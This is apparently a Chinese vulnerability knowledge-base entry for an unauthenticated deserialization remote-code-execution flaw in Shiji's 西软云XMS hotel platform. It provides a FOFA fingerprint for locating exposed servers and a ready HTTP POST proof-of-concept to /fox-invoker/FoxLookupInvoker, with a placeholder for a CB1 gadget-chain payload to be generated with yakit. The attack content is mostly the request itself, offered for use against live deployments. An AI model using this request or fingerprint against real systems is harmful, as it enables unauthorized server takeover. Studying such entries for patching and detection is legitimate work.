西软云XMS反序列化漏洞 西软云XMS反序列化漏洞西软云XMS /fox-invoker/FoxLookupInvoker接口处存在反序列化漏洞,未经身份认证的攻击者可利用此漏洞执行任意代码,获取服务器权限。 fofa1app="shiji-西软云XMS" poc123456POST /fox-invoker/FoxLookupInvoker/?return-exception=true HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36Connection: close {{hexdec(cb18x的序列化链)} 使用yakit 生成payload 漏洞知识库 西软云XMS-futurehotel-query接口存在XXE漏洞 上一篇 资管云comfileup.php前台文件上传漏洞(XVE-2024-18154) 下一篇
